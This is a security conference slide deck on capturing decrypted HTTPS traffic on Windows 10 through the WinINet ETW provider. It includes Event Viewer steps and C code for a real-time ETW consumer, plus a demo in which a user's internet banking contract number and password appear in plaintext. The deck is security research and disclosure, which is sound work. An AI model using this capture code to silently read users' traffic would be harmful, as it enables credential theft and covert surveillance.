Intercept HTTPS Traffic on Windows 10
Uploaded by: soya-aoyama (Category: Technology)
INTERCEPT HTTPS TRAFFIC ON WINDOWS 10
AVTOKYO 2016, Oct. 22nd 2016
ABOUT ME
• Soya Aoyama (AO)
• Security researcher who LOVES FRONTALE and DRINK
• Work at Fujitsu System Integration Laboratories Ltd. (since 2014)
• https://www.facebook.com/soya.aoyama.3
INTRODUCTION
These slides include some fiction, and parts of them bear no relation to actual persons, entities, etc.
CONVERSATION BETWEEN THE TWO (1)
"Hi Bill, I heard that a great function was added to Windows 10, correct?"
"Well, yes, Tim. The function to expose attackers' behaviors."
"Wow. What's the function in particular?"
"Capture the full WinINet traffic. It can be checked through Event Viewer."
HOW TO CHECK
1. Open Event Viewer and select "Applications and Services Logs" > "Microsoft" > "Windows" > "WinINet (Microsoft-Windows-WinINet-Capture)" > "Capture/Analytic"
2. Click "Enable Log" to enable the log
3. Start Edge and access web services
THE RESULT
(Screenshot: details of an event in Event Viewer)
CONVERSATION BETWEEN THE TWO (2)
"Where are the captured data stored?"
"It's in the Payload in the Details."
"It's like cipher text and incomprehensible, isn't it?"
"A-a-I c-c-can read it by eye."
STRING CONVERSION
1. Copy the contents of Payload
2. Paste into http://singoro.net/16henkan/

Payload (hex):
485454502F312E3120323030204F4B0D0A43616368652D436F6E74726F6C3A206E6F2D63616368652C206E6F2D73746F72652C206D7573742D726576616C69646174650D0A507261676D613A206E6F2D63616368650D0A436F6E74656E742D547970653A20746578742F706C61696E0D0A457870697265733A202D310D0A5365727665723A204D6963726F736F66742D4949532F382E350D0A533A20434831415050455830393436360D0A4163636573732D436F6E74726F6C2D416C6C6F772D4F726967696E3A202A0D0A4163636573732D436F6E74726F6C2D416C6C6F772D486561646572733A20436F6E74656E742D547970650D0A4163636573732D436F6E74726F6C2D416C6C6F772D4D6574686F64733A20504F53542C204745542C204F5054494F4E532C20484541440D0A4163636573732D436F6E74726F6C2D4D61782D4167653A2032313630300D0A446174653A205468752C2030382053657020323031362030353A34323A313820474D540D0A436F6E74656E742D4C656E6774683A20300D0A0D0A

Decoded (each 0D0A is a CRLF line break):
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/8.5
S: CH1APPEX09466
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Methods: POST, GET, OPTIONS, HEAD
Access-Control-Max-Age: 21600
Date: Thu, 08 Sep 2016 05:42:18 GMT
Content-Length: 0
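The conversion the slide does by hand on a web site, as an added example that is not part of the original talk: a small C program that decodes the hex Payload string and reads one header back out of the recovered HTTP response. SAMPLE_HEX is a prefix of the payload shown above (status line, Server header, end of headers); hex_decode and http_header are names chosen here.

```c
/* Added example (not from the slides): decode the hex "Payload" that Event Viewer shows
 * for a WinINet-Capture event, then read one header out of the recovered HTTP message. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Prefix of the page's own payload: status line, Server header, blank line. */
static const char SAMPLE_HEX[] =
    "485454502F312E3120323030204F4B0D0A"                      /* HTTP/1.1 200 OK\r\n */
    "5365727665723A204D6963726F736F66742D4949532F382E350D0A"  /* Server: Microsoft-IIS/8.5\r\n */
    "0D0A";                                                   /* end of headers */

/* Hex -> bytes, NUL-terminated. Returns the byte count, or -1 on bad input. */
int hex_decode(const char *hex, unsigned char *out, size_t cap) {
    size_t n = strlen(hex);
    if (n % 2 || n / 2 + 1 > cap) return -1;
    for (size_t i = 0; i < n; i += 2) {
        if (!isxdigit((unsigned char)hex[i]) || !isxdigit((unsigned char)hex[i + 1])) return -1;
        char pair[3] = { hex[i], hex[i + 1], 0 };
        out[i / 2] = (unsigned char)strtoul(pair, NULL, 16);
    }
    out[n / 2] = 0;
    return (int)(n / 2);
}

/* Copy the value of CRLF-delimited header `name` (case-sensitive) into val. Only the
 * header block is scanned, so a body never matches. Returns 1 if found, else 0. */
int http_header(const char *msg, const char *name, char *val, size_t cap) {
    size_t nlen = strlen(name);
    const char *line = strstr(msg, "\r\n"), *end;      /* CRLF that ends the status line */
    /* each round steps past that CRLF; the loop ends at the empty line (or a bad message) */
    for (; line && (line += 2, strncmp(line, "\r\n", 2) != 0); line = end) {
        if (!(end = strstr(line, "\r\n"))) return 0;
        if (strncmp(line, name, nlen) != 0 || line[nlen] != ':') continue;
        const char *v = line + nlen + 1;
        while (*v == ' ') v++;
        size_t vlen = (size_t)(end - v);
        if (vlen >= cap) vlen = cap - 1;               /* truncate, never overflow val */
        memcpy(val, v, vlen);
        val[vlen] = 0;
        return 1;
    }
    return 0;
}

int main(void) {
    unsigned char msg[256];
    char server[64];
    if (hex_decode(SAMPLE_HEX, msg, sizeof msg) < 0) return 1;
    printf("%s", (char *)msg);                         /* the recovered HTTP response */
    if (http_header((char *)msg, "Server", server, sizeof server)) printf("Server => %s\n", server);
    return 0;
}
```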
CONVERSATION BETWEEN THE TWO (3)
"It seems really captured… but no time to convert per packet, right?"
"No worries. It's designed to be captured from applications."
"Well done, Bill. You never miss a trick. How do you realize it?"
"I use Event Tracing for Windows (ETW)."
SOURCE PROGRAM
Application to capture WinINet contents in real time.

#include <Windows.h>
#include <Evntrace.h>
#include <stdio.h>
#include <wchar.h>
#include <tdh.h>

TRACEHANDLE controllerHandle = INVALID_PROCESSTRACE_HANDLE;
LPWSTR sessionName = L"Microsoft-Windows-WinInet-Capture";
HANDLE event = NULL;

EXTERN_C __declspec(selectany) const GUID PROVIDERID_Microsoft_Windows_WinInet_Capture =
    { 0xa70ff94f, 0x570b, 0x4979, { 0xba, 0x5c, 0xe5, 0x9c, 0x9f, 0xea, 0xb6, 0x1b } };

// Event callback: print the captured bytes that follow the 16-byte header at the start of UserData
void WINAPI EventRecordCallback(PEVENT_RECORD EventRecord) {
    if (TRUE == IsEqualGUID(PROVIDERID_Microsoft_Windows_WinInet_Capture, EventRecord->EventHeader.ProviderId)) {
        if (EventRecord->UserDataLength <= 0x10) return;   // nothing after the header; avoids a length underflow
        char *UserData = (char *)malloc(EventRecord->UserDataLength);
        if (UserData == NULL) return;
        memset(UserData, 0, EventRecord->UserDataLength);  // the unused tail stays zero, so the copy is NUL-terminated
        memcpy(UserData, (PBYTE)EventRecord->UserData + 0x10, EventRecord->UserDataLength - 0x10);
        printf("%s\n", UserData);
        free(UserData);
    }
}

// Consumer thread
DWORD WINAPI ThreadProc(LPVOID lpParameter) {
    // Open the session: a controller must already have started a real-time session with this
    // name and enabled the provider on it; the consumer only attaches to it by logger name
    EVENT_TRACE_LOGFILE logFile = { 0 };
    logFile.LogFileName = NULL;
    logFile.LoggerName = sessionName;
    logFile.ProcessTraceMode = PROCESS_TRACE_MODE_EVENT_RECORD | PROCESS_TRACE_MODE_REAL_TIME;
    logFile.EventRecordCallback = &EventRecordCallback;
    TRACEHANDLE consumerHandle = OpenTrace(&logFile);
    if (consumerHandle == INVALID_PROCESSTRACE_HANDLE) return 1;
    ProcessTrace(&consumerHandle, 1, NULL, NULL);   // blocks and delivers each event to the callback
    CloseTrace(consumerHandle);
    return 0;
}
EVENT TRACING FOR WINDOWS
Microsoft blog: https://blogs.msdn.microsoft.com/jpwdkblog/2011/12/27/event-tracing-for-windows-etw/
Aetos382's blog: http://tech.blog.aerie.jp/archive/category/ETW
CONVERSATION BETWEEN THE TWO (4)
"O-o-only requires this much code…"
"Super EASY, isn't it?"
"I know you apply this to all PCs inside, huh?"
"What?"
USERS WHO DON’T KNOW ANYTHING
Access an internet banking site
THE RESULT
_PAGEID=AA011&_SENDTS=1467876489534&_TRANID=AA011_001&_SUBINDEX=-1&_TARGET=MUFGpop_syokai&_FRAMID=&_LUID=LUID&_WINID=root&_TARGETWINID=&DEVICEPRINT=version%253D3%252E4%252E1%252E0%255F1%2526pm%255Ffpua%253Dmozilla%252F5%252E0%2520%2528windows%2520nt%252010%252E0%2529%2520applewebkit%252F537%252E36%2520%2528khtml%252C%2520like%2520gecko%2529%2520chrome%252F46%252E0%252E2486%252E0%2520safari%252F537%252E36%2520edge%252F13%252E10586%257C5%252E0%2520%2528Windows%2520NT%252010%252E0%2529%2520AppleWebKit%252F537%252E36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome%252F46%252E0%252E2486%252E0%2520Safari%252F537%252E36%2520Edge%252F13%252E10586%257CWin32%2526pm%255Ffpsc%253D24%257C1729%257C864%257C824%2526pm%255Ffpsw%253D%2526pm%255Ffptz%253D9%2526pm%255Ffpln%253Dlang%253Dja%252DJP%257Csyslang%253D%257Cuserlang%253D%2526pm%255Ffpjv%253D1%2526pm%255Ffpco%253D1%2526pm%255Ffpasw%253Dflash%257C%2526pm%255Ffpan%253DNetscape%2526pm%255Ffpacn%253DMozilla%2526pm%255Ffpol%253Dtrue%2526pm%255Ffposp%253D%2526pm%255Ffpup%253D%2526pm%255Ffpsaw%253D1729%2526pm%255Ffpspd%253D24%2526pm%255Ffpsbd%253D0%2526pm%255Ffpsdx%253D96%2526pm%255Ffpsdy%253D96%2526pm%255Ffpslx%253D96%2526pm%255Ffpsly%253D96%2526pm%255Ffpsfse%253Dtrue%2526pm%255Ffpsui%253D%2526pm%255Fos%253DWindows%2526pm%255Fbrmjv%253D46%2526pm%255Fbr%253DChrome%2526pm%255Finpt%253D%2526pm%255Fexpt%253D&KEIYAKU_NO=12345678&PASSWORD=87654321
HTTP/1.1 200 OK
Date: Thu, 07 Jul 2016 07:28:47 GMT
Server: Apache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-length: 11661
Content-Type: text/html;charset=Shift_JIS
Connection: close
KEIYAKU_NO=12345678
PASSWORD=87654321
CONVERSATION BETWEEN THE TWO (5)
"Amazing. No encryption or anything…"
"Yeah. Even internal fraud monitoring can be done."
"What about security? No risk of being abused by attackers?"
"No worries!! Data capture is impossible without administrative privileges."
CONCLUSION
Vulnerabilities that allow privilege elevation… are found even this year!!
CVE-2016-0099, CVE-2016-3371
Insanely Great!!